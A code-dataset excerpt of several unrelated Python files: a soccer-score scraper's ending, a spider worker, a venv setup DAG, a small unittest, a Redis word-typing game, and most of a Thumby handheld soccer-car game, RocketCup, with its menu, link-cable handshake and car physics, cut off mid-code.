away = soup.find(\r\n 'div', class_='duelParticipant__away').text.strip()\r\n aways.append(away)\r\n\r\n full_time = soup.find(\r\n 'div', class_='duelParticipant__score').text.strip('Finale')\r\n full_time = full_time.strip('\\xa0')\r\n try:\r\n full_time = re.findall('\\d+-\\d+', full_time)[0]\r\n except:\r\n full_time = '-'\r\n # print(full_time)\r\n if full_time == '-':\r\n half_time = '-'\r\n else:\r\n try:\r\n half_time = soup.find(\r\n 'div', class_='smv__incidentsHeader section__title').text.replace(' ', '')\r\n half_time = re.findall('\\d+-\\d+', half_time)[-1]\r\n # print(half_time)\r\n except:\r\n half_time = '-'\r\n # half-time-error\r\n print(c, 'half_time error')\r\n\r\n first_values.append(first_value)\r\n first_dirs.append(first_dir)\r\n\r\n x_values.append(x_value)\r\n x_dirs.append(x_dir)\r\n\r\n second_values.append(second_value)\r\n second_dirs.append(second_dir)\r\n\r\n fts.append(full_time)\r\n hts.append(half_time)\r\n except:\r\n print(c, 'full-error')\r\n df = pd.DataFrame({\r\n 'country': countries,\r\n 'league': leagues,\r\n 'date': dates,\r\n 'time': times,\r\n 'home': homes,\r\n 'away': aways,\r\n 'FT': fts,\r\n 'HT': hts,\r\n '_1_dir': first_dirs,\r\n '_1': first_values,\r\n 'x_dir': x_dirs,\r\n 'x': x_values,\r\n '_2_dir': second_dirs,\r\n '_2': second_values\r\n })\r\n rr = link.split('/')\r\n country_name = rr[-4].capitalize()\r\n league_name = rr[-3].capitalize()\r\n excel_name = f'{country_name}-{league_name}'\r\n tablename = f'{rr[-4]}_{rr[-3]}'\r\n tablename_sql = tablename.replace('-', '_')\r\n tablename_sql = tablename_sql.replace(':', '_')\r\n df.to_excel(f'results\\\\played\\\\{tablename_sql}.xlsx',\r\n index=False, sheet_name=f'{excel_name}')\r\n cr.execute(\r\n f'create table if not exists back_up (country text, league text, date text, time text, home text,away text, FT text, HT text, _1_dir text, _1 text, x_dir, x, _2_dir text, _2 );')\r\n df.to_sql(f'back_up', conn, if_exists='append',\r\n index=False, index_label=False)\r\ndriver.close()\r\nconn.commit()\r\ncr.close()\r\nconn.close()\r\ninput('\\nDone.....\\nPress Enter to close')\r\n","repo_name":"mohsensoliman44501/projects-z","sub_path":"soccer scores/played.py","file_name":"played.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70912136804","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\"),\n# see LICENSE for more details: http://www.apache.org/licenses/LICENSE-2.0.\n\n\"\"\"\n:author: Zhang Yi \n:date: 2018-1-9 17:27:08\n\"\"\"\n\nfrom cdspider.worker import BaseWorker\nfrom cdspider.libs.constants import *\nfrom cdspider.libs.utils import load_handler\n\nclass NewtaskWorker(BaseWorker):\n\n inqueue_key = QUEUE_NAME_NEWTASK\n\n def on_result(self, message):\n self.debug(\"got message: %s\" % message)\n try:\n name = message.get('mode', HANDLER_MODE_DEFAULT)\n handler = load_handler(name, self.ctx, None)\n self.debug(\"Spider loaded handler: %s\" % handler)\n handler.newtask(message)\n del handler\n except Exception as e:\n self.error(e)","repo_name":"loeyae/lspider","sub_path":"cdspider/worker/newtask_worker.py","file_name":"newtask_worker.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22479416690","text":"from dagrun import ExecTask, Graph\n\ncreate_venv = ExecTask(\"python\", [\"-m\", \"venv\", \".venv\"])\nupdate_pip = ExecTask(\".venv/bin/python\", [\"-m\", \"pip\", \"install\", \"-U\", \"pip\"])\ninstall_dev_deps = ExecTask(\".venv/bin/pip\", [\"install\", \"-r\", \"requirements-dev.txt\"])\ninstall_editable = ExecTask(\".venv/bin/pip\", [\"install\", \"-e\", \".\"])\n\ngraph = Graph.build([\n create_venv,\n (update_pip, [create_venv]),\n (install_dev_deps, [update_pip]),\n (install_editable, [update_pip]),\n])\n","repo_name":"gwerbin/dagrun.py","sub_path":"dags/setup_dev.py","file_name":"setup_dev.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21250735069","text":"import unittest\nfrom auto_test_1_1 import full_name\n\n\nclass NameTestCase(unittest.TestCase):\n \"\"\"Автоматическое тестирование для функции full_name(auto_test_1_1.py).\"\"\"\n\n def test_name_last(self):\n \"\"\"Проверка ФИО по формату: 'Петров Василий'\"\"\"\n format_name = full_name(\"Петров\", \"Василий\")\n self.assertEqual(format_name, \"Петров Василий\")\n\n def test_last_name_patronymic(self):\n \"\"\"Проверка ФИО по формату: 'Петров Василий Васильевич'\"\"\"\n format_name = full_name(\"Петров\", \"Василий\", \"Васильевич\", )\n self.assertEqual(format_name, \"Петров Василий Васильевич\")\n\n\nif __name__ == \"__name__\":\n unittest.main()\n","repo_name":"ra1ngts/testing","sub_path":"auto_test_1/auto_test_1_2.py","file_name":"auto_test_1_2.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15579873435","text":"from uuid import uuid1\nfrom datetime import datetime, timedelta\n\nfrom src.database.base import SessionLocal\nfrom src.database.operations import query_random_words\nfrom src.redis.interface import get_redis\nfrom src.utils.date import now_to_str\nfrom settings.stages import STAGES\n\n\nclass Game:\n INITIAL_STAGE = 1\n\n def __init__(self, username: str):\n self.username = username\n self.key = f\"{hash(self.username)}_{self.username}\"\n self.data = {\n 'username': self.username,\n 'started': datetime.now().strftime(\"%Y-%m-%d_%H:%S:%M\"),\n 'current_stage': self.INITIAL_STAGE\n }\n\n @property\n def current_stage(self):\n return self.data['current_stage']\n\n @classmethod\n async def create_for(cls, username: str) -> dict:\n instance = cls(username)\n instance.data['started'] = now_to_str()\n\n redis = await get_redis()\n await redis.hmset(instance.key, **instance.data)\n return instance.data\n\n @classmethod\n async def from_redis(cls, game_id: str):\n redis = await get_redis()\n game_data = await redis.hgetall(game_id)\n instance = cls(username=game_data['username'])\n instance.data['started'] = game_data['started']\n instance.data['current_stage'] = game_data['current_stage']\n return instance.data\n\n\nclass Stage:\n\n def __init__(self, stage_id: str, number: int = 1):\n self.stage_id = stage_id or str(uuid1())\n self.number = number\n self.data = {\n \"game_id\": \"\",\n \"number\": self.number,\n \"words\": [],\n \"timeout\": \"\",\n \"started\": \"\",\n \"score\": 0\n }\n\n @property\n def words(self) -> list:\n return self.data['words'].split(',')\n\n @property\n def score(self) -> int:\n return int(self.data['score'])\n\n @property\n def started(self) -> datetime:\n return datetime.strptime(self.data['started'], \"%Y-%m-%d_%H:%M:%S\")\n\n @property\n def timeout(self) -> int:\n return int(self.data['timeout'])\n\n def generate_words(self, session: SessionLocal):\n self.data['words'] = ','.join(query_random_words(session, STAGES[self.number]['words_number']))\n\n def set_timeout_from_settings(self):\n self.data['timeout'] = STAGES[self.number]['timeout']\n\n @classmethod\n async def create(cls, session: SessionLocal, stage_id: str, number: int = 1):\n instance = cls(stage_id, number)\n instance.generate_words(session)\n instance.set_timeout_from_settings()\n redis = await get_redis()\n await redis.hmset(instance.stage_id, **instance.data)\n return instance.data\n\n @classmethod\n async def from_redis(cls, stage_id: str):\n redis = await get_redis()\n stage_data = await redis.hgetall(stage_id)\n instance = cls(stage_id=stage_id)\n instance.data['game_id'] = stage_data['game_id']\n instance.data['number'] = stage_data['number']\n instance.data['words'] = stage_data['words']\n instance.data['timeout'] = stage_data['timeout']\n instance.data['score'] = int(stage_data['score'])\n return instance\n\n async def pass_word(self, word: str):\n redis = await get_redis()\n result = await redis.hincrby(self.stage_id, \"score\", 1)\n self.data['score'] += 1\n return result\n\n async def check_timeout_expired(self) -> bool:\n return (datetime.now() - self.started).seconds > self.timeout\n\n\n","repo_name":"l3str4nge/fastwriting","sub_path":"src/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25188004674","text":"from sys import path as syspath\nsyspath.insert(0, '/Games/RocketCup')\n\nimport time\nimport math\nimport thumbyGrayscale as thumby\n#import thumby\nimport thumbyAudio\nimport random\nfrom thumbySaves import saveData\nfrom machine import Pin, UART\n\nthumby.display.setFPS(30)\n\ntry:\n import emulator\n emulated = True\nexcept ImportError:\n emulated = False\n\ndef lerp(v1,v2,f):\n return v1 + (v2-v1) * f\n \ndef saveDataOptItem(key, default):\n if (saveData.hasItem(key)):\n return saveData.getItem(key)\n else:\n return default\n\ntry:\n \n sprBallTex = thumby.Sprite(12, 12, [bytearray([231,231,255,60,60,255,231,231,255,60,60,255,\n 9,9,15,15,15,15,9,9,15,15,15,15]),bytearray([60,60,219,231,231,219,60,60,219,231,231,219,\n 15,15,6,9,9,6,15,15,6,9,9,6])])\n sprBallVoid = thumby.Sprite(18, 18, bytearray([0,0,0,0,0,0,128,192,192,192,192,128,0,0,0,0,0,0,\n 0,0,0,0,0,0,7,15,15,15,15,7,0,0,0,0,0,0,\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]), key=1)\n sprBallOutline = thumby.Sprite(8, 8, [bytearray([60,66,129,129,129,129,66,60]),bytearray([0,64,128,128,128,128,64,60])], key=0)\n \n # BITMAP: width: 16, height: 8\n bmpWipe = bytearray([119,238,119,238,187,221,187,221,221,187,221,187,238,119,238,119])\n \n saveData.setName(\"RocketCup\")\n sdSound = saveDataOptItem(\"sound\",1)\n sdGrayscale = saveDataOptItem(\"grayscale\",1)\n sdAi = saveDataOptItem(\"ai\",0)\n sdTurnAssist = saveDataOptItem(\"turn-assist\",0)\n \n if (not sdGrayscale):\n thumby.display.disableGrayscale()\n \n thumbyAudio.audio.setEnabled(sdSound)\n \n \n ###############\n ## MENU LOOP ##\n ###############\n \n \n # BITMAP: width: 45, height: 40\n bmpMenuCar = bytearray([0,88,16,96,224,96,96,96,48,48,48,48,16,24,24,24,24,24,24,29,10,4,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0,0,0,240,240,240,224,240,184,240,240,248,232,194,140,152,194,68,105,249,251,248,252,252,248,248,240,224,192,128,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0,160,128,192,187,247,215,31,47,15,15,11,127,95,255,255,252,248,240,224,193,131,143,255,231,135,135,3,3,3,3,2,140,216,224,192,128,192,192,192,128,128,0,0,0,\n 0,2,7,7,3,5,2,0,0,0,0,0,0,1,15,15,31,31,31,31,47,63,255,255,191,127,63,63,255,255,127,255,255,255,255,255,255,255,255,239,15,7,3,3,0,\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,31,62,63,0,7,2,0,0,0,0,1,3,12,11,11,0,9,0,4,4,18,1,0,1,0,0])\n bmpsMenuCar = bytearray([16,120,112,224,224,224,96,112,240,240,112,112,56,56,56,56,120,248,31,31,30,28,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0,0,112,248,184,48,16,112,233,223,140,28,62,62,126,126,190,191,191,175,15,14,22,12,24,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0,252,254,254,255,250,248,248,248,249,115,127,126,252,248,33,198,12,216,1,66,198,184,0,116,4,132,132,128,128,130,134,136,248,0,64,192,64,64,192,0,128,128,0,0,\n 0,3,15,31,63,63,63,31,15,1,0,0,0,3,15,31,27,30,157,235,251,242,227,226,230,224,232,193,209,224,192,52,192,128,144,64,128,11,222,255,254,252,255,127,0,\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,15,63,127,255,255,255,255,127,7,3,3,31,63,63,63,63,63,63,63,63,31,31,15,15,7,0,0])\n \n # BITMAP: width: 42, height: 8\n bmpMenuLogoRocket = bytearray([0,0,126,126,22,126,108,0,60,126,102,126,60,0,60,126,102,102,0,126,126,24,126,102,0,126,126,86,86,0,6,126,126,6,60,66,1,1,1,1,0,0])\n bmpsMenuLogoRocket = bytearray([60,126,129,193,233,129,219,255,195,129,153,193,227,255,195,129,153,221,255,129,193,231,129,221,255,129,129,169,253,255,249,129,193,253,255,195,129,129,129,129,66,60])\n \n # BITMAP: width: 33, height: 12\n bmpMenuLogoCup = bytearray([0,0,224,24,4,2,2,2,2,2,0,0,0,0,254,2,0,0,252,2,1,0,0,0,0,248,7,1,65,33,28,0,0,\n 0,0,3,4,8,0,4,4,4,4,2,1,0,0,15,0,0,2,3,0,0,0,0,8,7,0,0,0,0,0,0,0,0])\n bmpsMenuLogoCup = bytearray([28,50,226,249,253,95,71,67,99,62,28,124,134,130,254,254,64,32,252,254,255,1,124,134,3,249,255,31,65,99,126,126,60,\n 0,0,3,7,15,14,12,12,12,4,2,1,0,0,15,15,12,6,7,15,15,4,0,8,15,15,15,8,0,0,0,0,0])\n \n # BITMAP: width: 33, height: 8\n bmpMenuLogoCupShineA = bytearray([0,0,224,248,252,30,6,2,2,2,0,0,0,0,254,254,0,0,252,254,255,0,0,0,0,248,255,31,65,99,126,126,60])\n bmpsMenuLogoCupShineA = bytearray([28,50,2,225,249,93,69,65,97,60,28,124,134,130,0,252,64,32,0,252,254,1,124,134,3,1,248,30,0,66,98,126,60])\n bmpMenuLogoCupShineB = bytearray([0,0,3,7,15,14,12,12,12,4,2,1,0,0,15,15,12,6,7,15,15,4,0,8,15,15,15,8,0,0,0,0,0])\n bmpsMenuLogoCupShineB = bytearray([0,0,0,3,7,14,8,8,8,0,0,0,0,0,0,15,12,4,4,15,15,4,0,0,8,15,15,8,0,0,0,0,0])\n # BITMAP: width: 8, height: 8\n bmpMenuLogoCupShineMaskA = bytearray([7,56,199,63,255,248,192,0])\n bmpMenuLogoCupShineMaskB = bytearray([240,240,241,254,241,255,255,254])\n bmpMenuLogoCupShineSliceA = bytearray(8)\n bmpsMenuLogoCupShineSliceA = bytearray(8)\n bmpMenuLogoCupShineSliceB = bytearray(8)\n bmpsMenuLogoCupShineSliceB = bytearray(8)\n \n sfxNav = [600,100]\n \n animFrame = 0\n animDuration = 45\n while (animFrame < animDuration + 5):\n animFrame += 1\n \n # Car Driving\n animLerp = ((-math.cos(math.pi * animFrame / animDuration) + 1) * 0.75) % 1\n animX = lerp(-70,70,animLerp)\n animY = lerp(-45,45,animLerp)\n thumby.display.fill(0)\n \n # Car Brake Jerk\n if (animFrame == animDuration + 5):\n animX = 0\n animY = 0\n elif (animFrame > animDuration):\n animX = 1\n animY = 1\n else:\n #Ball Rotation\n ballLerp = (-math.cos(math.pi * animFrame / animDuration) + 1)\n \n sprBallTex.x = 66 - 9 + ((int(ballLerp * 10+1)) % 6)\n sprBallTex.y = 6 - 9 + ((int(ballLerp * 5)) % 6)\n thumby.display.drawSprite(sprBallTex)\n sprBallVoid.x = 66 - 9\n sprBallVoid.y = 6 - 9\n thumby.display.drawSprite(sprBallVoid)\n \n thumby.display.blit([bmpMenuCar, bmpsMenuCar],round(animX),round(animY),45,40,-1,0,0)\n thumby.display.blit([bmpMenuLogoRocket,bmpsMenuLogoRocket],72 - 44,2,42,8,0,0,0)\n thumby.display.blit([bmpMenuLogoCup,bmpsMenuLogoCup],72 - 33,11,33,12,0,0,0)\n \n thumby.display.update()\n \n showOptions = False\n optionSelect = 0\n options = [[\"Play CPU\"], \n [\"Link Cable\"],\n [\"Training\"],\n [\"Sound OFF\",\"Sound ON\"], \n [\"Display BW\",\"Display GS\"], \n [\"AI EASY\",\"AI MEDIUM\",\"AI HARD\"],\n [\"Turn ONCE\",\"Turn SLOW\",\"Turn FAST\"],\n [\"Credits\"]]\n optionText = [0,0,0,sdSound,sdGrayscale,sdAi,sdTurnAssist,0]\n gameMode = -1\n \n thumby.display.setFont(\"/lib/font3x5.bin\", 3, 5, 2)\n while (True):\n if (not showOptions and \n (thumby.buttonL.justPressed() \n or thumby.buttonR.justPressed()\n or thumby.buttonA.justPressed())):\n showOptions = True\n else:\n if (thumby.buttonR.justPressed()):\n optionSelect = (optionSelect + 1) % len(options)\n thumbyAudio.audio.play(sfxNav[0],sfxNav[1])\n elif (thumby.buttonL.justPressed()):\n optionSelect = (optionSelect + len(options) - 1) % len(options)\n thumbyAudio.audio.play(sfxNav[0],sfxNav[1])\n elif (thumby.buttonA.justPressed()):\n if (optionSelect == 0): # Play CPU\n gameMode = 0\n break\n \n elif (optionSelect == 1): # Link Cable\n gameMode = 1\n break\n \n elif (optionSelect == 2): # Training\n gameMode = 2\n break\n \n elif (optionSelect == 3): # Sound\n sdSound = optionText[optionSelect] = (sdSound + 1) % 2\n saveData.setItem(\"sound\",sdSound)\n saveData.save()\n thumbyAudio.audio.setEnabled(sdSound)\n thumbyAudio.audio.play(sfxNav[0],sfxNav[1])\n \n elif (optionSelect == 4): # Display\n sdGrayscale = optionText[optionSelect] = (sdGrayscale + 1) % 2\n saveData.setItem(\"grayscale\",sdGrayscale)\n saveData.save()\n if (sdGrayscale):\n thumby.display.enableGrayscale()\n else:\n thumby.display.disableGrayscale()\n \n elif (optionSelect == 5): # AI\n sdAi = optionText[optionSelect] = (sdAi + 1) % 3\n saveData.setItem(\"ai\",sdAi)\n saveData.save()\n \n elif (optionSelect == 6): # Turn Assist\n sdTurnAssist = optionText[optionSelect] = (sdTurnAssist + 1) % 3\n saveData.setItem(\"turn-assist\",sdTurnAssist)\n saveData.save()\n \n elif (optionSelect == 7): # Credits\n gameMode = 3\n break\n \n animFrame += 1\n ballLerp += abs((math.pi*math.sin((math.pi*animFrame)/100))/100)\n sprBallTex.x = 66 - 9 + ((int(ballLerp * 10+1)) % 6)\n sprBallTex.y = 6 - 9 + ((int(ballLerp * 5)) % 6)\n thumby.display.drawSprite(sprBallTex)\n sprBallVoid.x = 66 - 9\n sprBallVoid.y = 6 - 9\n thumby.display.drawSprite(sprBallVoid)\n \n thumby.display.blit([bmpMenuLogoRocket,bmpsMenuLogoRocket],72 - 44,2,42,8,0,0,0)\n thumby.display.blit([bmpMenuLogoCup,bmpsMenuLogoCup],72 - 33,11,33,12,0,0,0)\n \n shineFrame = min((animFrame * 3) % (30 * 15),(animFrame * 3 + 40) % (30 * 15))\n if (shineFrame < (33 + 7)):\n shineX = shineFrame - 7\n shineY = 11\n for i in range(8):\n j = shineX + i\n if (j < 0 or j >= 33):\n bmpMenuLogoCupShineSliceA[i] = 0\n bmpsMenuLogoCupShineSliceA[i] = 0\n bmpMenuLogoCupShineSliceB[i] = 0\n bmpsMenuLogoCupShineSliceB[i] = 0\n else:\n bmpMenuLogoCupShineSliceA[i] = bmpMenuLogoCupShineA[j]\n bmpsMenuLogoCupShineSliceA[i] = bmpsMenuLogoCupShineA[j]\n bmpMenuLogoCupShineSliceB[i] = bmpMenuLogoCupShineB[j]\n bmpsMenuLogoCupShineSliceB[i] = bmpsMenuLogoCupShineB[j]\n thumby.display.blitWithMask([bmpMenuLogoCupShineSliceA,bmpsMenuLogoCupShineSliceA], \n 72 - 33 + shineX, shineY, 8, 8, 0, 0, 0, bmpMenuLogoCupShineMaskA)\n thumby.display.blitWithMask([bmpMenuLogoCupShineSliceB,bmpsMenuLogoCupShineSliceB], \n 72 - 33 + shineX, shineY+8, 8, 8, 0, 0, 0, bmpMenuLogoCupShineMaskB)\n \n thumby.display.blit([bmpMenuCar, bmpsMenuCar],0,0,45,40,0,0,0)\n \n if (showOptions):\n thumby.display.drawFilledRectangle(0, 40 - 11, 72, 9, 2)\n text = options[optionSelect][optionText[optionSelect]]\n thumby.display.drawText(text, 36 - int(5*len(text)/2), 40 - 9, 1)\n \n thumby.display.update()\n \n #Screen Wipe\n for i in range(72//4 + 4 + 5):\n for j in range(5):\n thumby.display.blit(bmpWipe,i*4-j*4-12,32-j*8,16,8,1,0,0)\n thumby.display.update()\n \n #[CPU,Linked,Training,Credits]\n oppExist = [True,True,False,False][gameMode]\n ballExist = [True,True,True,False][gameMode]\n scoreExist = [True,True,True,False][gameMode]\n goalExist = [True,True,True,False][gameMode]\n \n gmCPU = (gameMode == 0)\n gmLinked = (gameMode == 1)\n gmTraining = (gameMode == 2)\n gmCredits = (gameMode == 3)\n \n \n ####################\n ## LINK HANDSHAKE ##\n ####################\n \n \n class Link:\n mode = 0 # 0 = write first, 1 = read first\n syncFrames = 0\n \n def __init__(self):\n self.uart = UART(0, baudrate=115200, rx=Pin(1, Pin.IN), tx=Pin(0, Pin.OUT), timeout=1000, txbuf=1, rxbuf=1)\n Pin(2, Pin.OUT).value(1)\n while (self.uart.any() > 0):\n self.uart.read(1)\n \n def tryHandshake(self):\n self.uart.write(bytearray([0x80]))\n self.uart.read(1) #echo\n time.sleep(0.1) #enough time for a response\n while (self.uart.any() > 0):\n response = self.uart.read(1)[0]\n if (response == 0x81): #HandshakeAck\n self.mode = 1\n return True\n return False\n \n def tryHandshakeAck(self):\n while (self.uart.any() > 0):\n response = self.uart.read(1)[0]\n if (response == 0x80): #Handshake\n self.uart.write(bytearray([0x81]))\n self.uart.read(1) #echo\n self.mode = 0\n return True\n return False\n \n def sync(self,data):\n self.syncFrames += 1\n self.waitCount = 0\n if (self.mode == 0): #write first\n self.uart.write(bytearray([data]))\n self.uart.read(1) #echo\n \n while (self.uart.any() == 0):\n self.waitCount += 1\n \n return self.uart.read(1)[0]\n \n else: #read first\n while (self.uart.any() == 0):\n self.waitCount += 1\n ret = self.uart.read(1)\n \n self.uart.write(bytearray([data]))\n self.uart.read(1) #echo\n \n return ret[0]\n \n def clear(self):\n while (link.uart.any() > 0):\n link.uart.read(1)\n \n class EmuLink:\n syncFrames = 0\n \n def tryHandshake(self):\n self.mode = 0\n return random.random() < 0.3\n \n def tryHandshakeAck(self):\n self.mode = 1\n return random.random() < 0.01\n \n def sync(self,data):\n self.syncFrames += 1\n return data\n \n def clear(self):\n pass\n \n if (gmLinked):\n if (emulated):\n link = EmuLink()\n else:\n link = Link()\n \n thumby.display.setFont(\"/lib/font3x5.bin\", 3, 5, 2)\n thumby.display.drawText(\"CONNECTING\", 36 - 23, 10, 1)\n HandshakeWait = 0\n while (True):\n if (HandshakeWait >= 30):\n HandshakeWait = 0\n if (link.tryHandshake()):\n break\n else:\n if (link.tryHandshakeAck()):\n break\n \n HandshakeWait += 1\n \n lineX = 36 + HandshakeWait\n thumby.display.drawLine(lineX-1, 20, lineX-1, 30, 0)\n thumby.display.drawLine(72-lineX+1, 20, 72-lineX+1, 30, 0)\n thumby.display.drawLine(lineX, 20, lineX, 30, 1)\n thumby.display.drawLine(72-lineX, 20, 72-lineX, 30, 1)\n thumby.display.update()\n \n thumby.display.drawText(\"MODE \"+str(link.mode), 36 - 15, 35, 1)\n thumby.display.update()\n link.clear()\n time.sleep(1)\n \n \n ###############\n ## GAME LOOP ##\n ###############\n \n \n # BITMAP: width: 16, height: 16\n bmpCountdown3 = [bytearray([0,0,0,252,252,76,76,79,76,12,12,252,4,0,0,0,\n 0,0,0,31,31,18,18,18,18,16,16,31,0,0,0,0]),\n bytearray([0,0,0,0,248,72,72,72,75,8,8,248,248,0,0,0,\n 0,0,0,32,63,50,50,50,50,48,48,63,63,0,0,0])]\n bmpCountdown2 = [bytearray([0,0,0,252,252,220,204,79,12,12,156,252,4,0,0,0,\n 0,0,0,31,31,17,16,16,18,19,19,31,0,0,0,0]),\n bytearray([0,0,0,0,248,216,200,72,11,8,152,248,248,0,0,0,\n 0,0,0,32,63,49,48,48,50,51,51,63,63,0,0,0])]\n bmpCountdown1 = [bytearray([0,0,0,252,252,220,204,15,12,252,252,252,4,0,0,0,\n 0,0,0,31,31,19,19,16,16,19,19,31,0,0,0,0]),\n bytearray([0,0,0,0,248,216,200,8,11,248,248,248,248,0,0,0,\n 0,0,0,32,63,51,51,48,48,51,51,63,63,0,0,0])]\n bmpCountdownRotate1 = [bytearray([0,0,0,0,0,252,252,15,12,252,4,0,0,0,0,0,\n 0,0,0,0,0,31,31,16,16,31,0,0,0,0,0,0]),\n bytearray([0,0,0,0,0,0,248,8,11,248,248,0,0,0,0,0,\n 0,0,0,0,0,32,63,48,48,63,63,0,0,0,0,0])]\n bmpCountdownRotate2 = [bytearray([0,0,0,0,0,0,0,255,0,0,0,0,0,0,0,0,\n 0,0,0,0,0,0,0,31,0,0,0,0,0,0,0,0]),\n bytearray([0,0,0,0,0,0,0,0,255,0,0,0,0,0,0,0,\n 0,0,0,0,0,0,0,32,63,0,0,0,0,0,0,0])]\n bmpCountdownNumber = [bmpCountdown3,bmpCountdown2,bmpCountdown1]\n bmpCountdownAnim = [bmpCountdownRotate2,bmpCountdownRotate1,bmpCountdownNumber[0],bmpCountdownNumber[0],bmpCountdownRotate1]\n bmpCountdownArrow = [bytearray([24,40,79,129,129,79,40,24]),bytearray([0,16,48,126,126,48,16,0])]\n \n # BITMAP: width: 8, height: 8\n bmpCarUp = bytearray([0,0,100,90,90,100,0,0])\n bmpsCarUp = bytearray([0,0,100,38,38,100,0,0])\n bmpCarDiag = bytearray([0,16,40,76,58,18,12,0])\n bmpsCarDiag = bytearray([0,24,24,118,102,30,28,0])\n bmpCarRight = bytearray([0,60,36,24,24,36,24,0])\n bmpsCarRight = bytearray([0,36,60,0,0,60,24,0])\n \n bmpCarPlayer = bmpCarUp + bmpCarDiag + bmpCarRight\n bmpsCarPlayer = bmpsCarUp + bmpsCarDiag + bmpsCarRight\n bmpCarOpponent = bmpCarUp + bmpCarDiag + bmpCarRight\n bmpsCarOpponent = bmpsCarUp + bmpsCarDiag + bmpsCarRight\n \n bmpTrail0 = bytearray([0,0,0,0,0,0])\n bmpsTrail0 = bytearray([0,0,0,0,0,0])\n bmpTrail1 = bytearray([0,0,0,0,0,0])\n bmpsTrail1 = bytearray([0,0,12,12,0,0])\n bmpTrail2 = bytearray([0,0,12,12,0,0])\n bmpsTrail2 = bytearray([0,12,30,30,12,0])\n bmpTrail3 = bytearray([12,30,51,51,30,12])\n bmpsTrail3 = bytearray([12,18,33,33,18,12])\n bmpTrail4 = bytearray([0,0,0,0,0,0])\n bmpsTrail4 = bytearray([0,0,0,0,0,0])\n bmpTrails = bmpTrail0 + bmpTrail1 + bmpTrail2 + bmpTrail3 + bmpTrail4\n bmpsTrails = bmpsTrail0 + bmpsTrail1 + bmpsTrail2 + bmpsTrail3 + bmpsTrail4\n trailFrameCount = 5\n trailInterval = 2\n trailDuration = 16\n trailSpriteCount = (trailDuration + (trailInterval-1)) // trailInterval\n \n sprGoal = thumby.Sprite(4, 16, [bytearray([253,0,0,0,191,0,0,0]),bytearray([6,0,2,72,96,0,64,18])], key=0)\n\n bmpDigits = [bytearray([0,14,0]),\n bytearray([31,31,0]),\n bytearray([2,10,8]),\n bytearray([10,10,0]),\n bytearray([24,27,0]),\n bytearray([8,10,2]),\n bytearray([0,10,2]),\n bytearray([30,30,0]),\n bytearray([0,10,0]),\n bytearray([8,10,0])]\n sprDigit = thumby.Sprite(3,5, bmpDigits[0], key=1)\n\n bmpScoreTab = [bytearray([15,63,255,127,127,127,127,127,127,127,127,127,31,7,0]),\n bytearray([0,7,31,255,255,255,255,255,255,255,255,255,255,63,15])]\n \n mapRotX = [1,1,0,-1,-1,-1,0,1]\n mapRotY = [0,1,1,1,0,-1,-1,-1]\n \n speed1 = 0.75\n speed1MoveFrames = 30\n speed1StopFrames = 10\n speed1RevFrames = 5\n speed2 = 1.5\n \n class Car:\n x = 0.0\n y = 0.0\n \n rotate = 0\n gas = 0\n allowBoost = False\n \n speedShift = 0.0\n speed = 0\n \n trailCounter = 0\n trailNext = 0\n trailDecay = []\n \n sprTrails = []\n \n def __init__(self, bmpCars, bmpsCars):\n self.sprCar = thumby.Sprite(8, 8, [bmpCars, bmpsCars], key=0)\n for i in range(trailSpriteCount):\n self.sprTrails.append(thumby.Sprite(6, 6, [bmpTrails, bmpsTrails], key=0))\n for i in range(trailSpriteCount):\n self.trailDecay.append(0)\n \n def physicsUpdate(self):\n \n if (self.gas > 0):\n if (self.speedShift >= 0.0):\n self.speedShift += 1.0 / speed1MoveFrames\n else:\n self.speedShift += 1.0 / speed1RevFrames\n if (self.speedShift > 1.0):\n self.speedShift = 1.0\n elif (self.gas < 0):\n if (self.speedShift >= 0.0):\n self.speedShift -= 1.0 / speed1RevFrames\n else:\n self.speedShift -= 1.0 / speed1RevFrames\n if (self.speedShift < -1.0):\n self.speedShift = -1.0\n else:\n if (self.speedShift > 0.0):\n self.speedShift -= 1.0 / speed1StopFrames\n if (self.speedShift < 0.0):\n self.speedShift = 0.0\n elif (self.speedShift < 0.0):\n self.speedShift += 1.0 / speed1RevFrames\n if (self.speedShift > 0.0):\n self.speedShift = 0.0\n \n if (self.allowBoost and self.speedShift >= 1.0):\n self.speed = speed2\n elif (self.speedShift > 0.0):\n self.speed = speed1\n elif (self.speedShift < 0.0):\n self.speed = -speed1\n else:\n self.speed = 0\n \n self.trailCounter += 1\n \n self.x += self.speed * math.cos(self.rotate*math.pi/4.0)\n self.y += self.speed * math.sin(self.rotate*math.pi/4.0)\n \n if (self.x < 3):\n self.x = 3\n if (self.x > 69):\n self.x = 69\n if (self.y < 3):\n self.y = 3\n if (self.y > 37):\n self.y = 37\n \n def draw(self):\n if (self.allowBoost and self.speedShift >= 1.0 and ((self.trailCounter % trailInterval) == 0)):\n self.sprTrails[self.trailNext].x = round(self.x) - 3\n self.sprTrails[self.trailNext].y = round(self.y) - 3\n self.trailDecay[self.trailNext] = trailDuration\n self.trailNext = (self.trailNext + 1) % trailSpriteCount\n \n for i in range(trailSpriteCount):\n if (self.trailDecay[i] > 0):\n self.trailDecay[i] -= 1\n self.sprTrails[i].setFrame((trailFrameCount * self.trailDecay[i]) // trailDuration)\n 